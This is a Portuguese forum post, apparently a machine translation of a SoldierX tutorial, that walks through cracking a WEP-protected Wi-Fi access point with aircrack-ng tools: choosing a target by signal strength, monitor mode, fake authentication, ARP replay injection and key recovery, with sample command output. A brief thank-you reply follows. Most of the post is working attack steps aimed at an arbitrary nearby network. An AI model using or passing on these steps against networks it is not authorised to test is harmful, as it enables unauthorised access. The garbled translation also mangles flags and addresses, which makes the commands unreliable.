Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Crack wifi

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica Crack wifi

    Linux experiência CMD
    Backtrack 4 R2 ou Ubuntu 7.10 + Drivers remendado WiFi + Aircrack-ng
    senso comum

    As informações contidas neste tutorial é para fins educacionais e informativos, usá-lo em seu próprio risco. Soldierx.com, seus membros, a tripulação e afiliadas não pode ser responsabilizada pelo uso indevido dessas informações.

    Criptografia WEP tem sido aclamado como um dos métodos menos segura de garantir um ponto de acesso wireless na história do WiFi desde standards de encriptação wireless começou a ser desenvolvido. A principal razão para isto é que fragmentos da chave são enviadas entre um computador cliente eo ponto de acesso em vetores de inicialização de 32 bits comumente referido como o ICV. Estatisticamente tem sido demonstrado que um certo volume de estes têm criptografia fraca e são vulneráveis ​​à análise de pacotes. O número de pacotes necessários para quebrar uma chave de ponto de acesso pode variar de 2-500 para 64 e criptografia de 128 bits respectivamente.

    *** NOTA ***
    ** Este tutorial irá cobrir uma rachadura WEP básica
    ** Não é de forma alguma exaustiva e é destinado a
    ** A saltar fora do ponto, a partir daqui que eu mandar você para o Google
    ** O lugar onde eu tenho a minha primeira informação.
    **********

    *** Todos os comandos listados neste tutorial são BING RUN partir da conta root na máquina, SE VOCÊ NÃO ESTÁ FUNCIONANDO BACKTRACK OU VOCÊ BUILT SEU PRÓPRIO SISTEMA Você precisa fazer login como root ou sudo CADA COMANDO***


    O primeiro passo para tentar qualquer cracker em um ponto de acesso WiFi é escolher um alvo. Isto pode ser conseguido através da execução airmon-ng para listar todas e quaisquer adaptadores de rede disponíveis.


    Interface Chipset Driver

    wifi0 Atheros madwifi-ng
    ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destruído)


    Então você quer tipo airodump-ng start (nome do adaptador: ath0, wlan0, wlan1, etc) que isso faz é colocá-lo adaptador sem fio em modo promíscuo ou monitor que permite que ele aceite todo o tráfego e, basicamente, pegar pacotes ARP e tal de fora do ar, ele também permite que tha adaptador para fazer o que é chamado de injeção de pacote, basicamente tiro pacotes para a rede para obter uma resposta do ponto de acesso. O próximo comando para executar é airodump-ng (nome do adaptador: mon0, mon1, eth0, etc) isso vai listar todos os pontos de acesso disponíveis e permite que você escolha uma. você vai querer pegar um com o melhor sinal. A maneira de verificar o que é o melhor sinal é olhar para a coluna pwr enquanto o programa está sendo executado. um sinal forte será um baixo número precedido por um traço (-), como -56 ou -86. O primeiro exemplo seria o mais forte como eu acredito que a força é medida em dBm-ou a relação potência em decibéis (dB) da potência medida referenciada a um miliwatt. quanto menor o número, sendo mais forte como você obtém mais para uma saída positiva do poder.


    CH 9] [decorrido: 8 minutos] [2007/03/21 19:25

    BSSID PWR Beacons RXQ # Dados # / s CH MB ENC CIPHER AUTH ESSID

    00:14:6 C: 7E: 40:80 42 100 5240 1783 07 338 9 54 WEP WEP teddy

    BSSID STATION PWR Perdido Sondas Pacotes

    00:14:6 C: 7E: 40:80 00:00 F: B5: 88: AC: 82 42 0 183.782

    Depois de ter seleccionado a sua meta, anote o BSSID, Channel, ea quantidade de dados que recebe. Outro bom indicador de uma boa accesspoint de crack seria uma quantidade razoável de dados recebidos (80-120 sem injeção, pode ser mais). Você, então, executar o comando airodump-ng-w arquivo - canal (de destino) - bssid (bssid ou o endereço MAC de destino) (interface para capturar em, mon0, eth0, seja qual for airmon dá-lhe como a interface de modo monitor tipicamente mon0)


    Exemplo:
    airodump-ng-w saída - canal 9 - C bssid 00:14:06: 7E: 40:80 ath0
    Nesta fase você deve então abrir uma aba na janela do seu console para uma sessão separada e executar o aireplay-ng -1 0-a (bssid da meta) (interface), este é um ataque de autenticação falsa e lhe dará algo como isto:
    18:18:20 Envio de solicitação de autenticação
    18:18:20 autenticação bem-sucedida
    18:18:20 Enviando Pedido Associação
    18:18:20 Associação :-) sucesso
    se você for bem sucedido. depois de ter alcançado uma associação bem sucedida em seguida, executar a injeção para coletar dados. (Você deseja executar este ao lado airodump-ng porque airodump captura e pacotes de lixeiras para um arquivo. Cap que você estará correndo por Aircrack-ng). Para definir o ataque estaremos executando este comando aireplay-ng -3-b (bssid da meta) (interface). Este comando inicia um pedido ARP ataque de repetição que vai estimular a coleta de dados que você precisa para quebrar o ponto de acesso com.

    Exemplo:

    aireplay-ng -3-b 00:14:6 C: 7E: 40:80 ath0
    Você deverá ver o seguinte:

    Salvar requisições ARP em replay_arp-0321-191525.cap
    Você também deve começar airodump-ng para capturar respostas.
    Leia 629.399 pacotes (tem 316.283 pedidos ARP), enviou 210.955 pacotes ...

    abrir outra janela console, um terceiro, e entrar Aircrack-ng e filename.cap aricrack tentará com uma rachadura que você capturou, e se não for bem sucedido vai monitorar a quantidade dos dados que você recebeu e continuar tentando quebrar a chave em intervalos regulares. uma vez que o crack tem sucedido você vai conhecê-lo por uma tela que tem o seguinte:

    Aircrack-ng 0,9

    [00:03:06] Testado 674.449 chaves (tenho 96.610 IVs)

    KB byte de profundidade (votação)
    0 0 / 9 12 (15) F9 (15) 47 (12) F7 (12) FE 1B (12) (5) 77 (5) A5 (3) F6 (3) 03 (0)
    1 0 / 8 34 (61) E8 (27) E0 (24) 06 (18) 3B (16) 4E (15) E1 (15) 2D (13) 89 (12) E4 (12)
    2 0 / 2 56 (87) A6 (63) 15 (17) 02 (15) 6B (15) E0 (15) AB (13) 0E (10) 17 (10) 27 (10)
    3 05/01 78 (43) 1A (20) 9B (20) 4B (17) 4A (16) 2B (15) 4D (15) 58 (15) 6A (15) 7C (15)

    KEY FOUND! [12:34:56:78:90]
    Probabilidade: 100%
    Nesta tela permitirá que você saiba que você tem com sucesso rachou a chave e você pode copiá-lo para baixo para uso ou teste. cn você fazer backup dos arquivos. cap para uma unidade flash e crack em uma data posterior, se você perder a chave. embora se mudanças fundamentais do ponto de acesso você pode ter que quebrá-la novamente.

    Isso é tudo o que é realmente necessário saber para quebrar um ponto de acesso WEP criptografada.


    Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

  • Font Size
    #2
    mto bom a materia , obrigado por compartilhar Jonatan ST's vai ajudar muita gente

    Comment

    X
    Working...
    X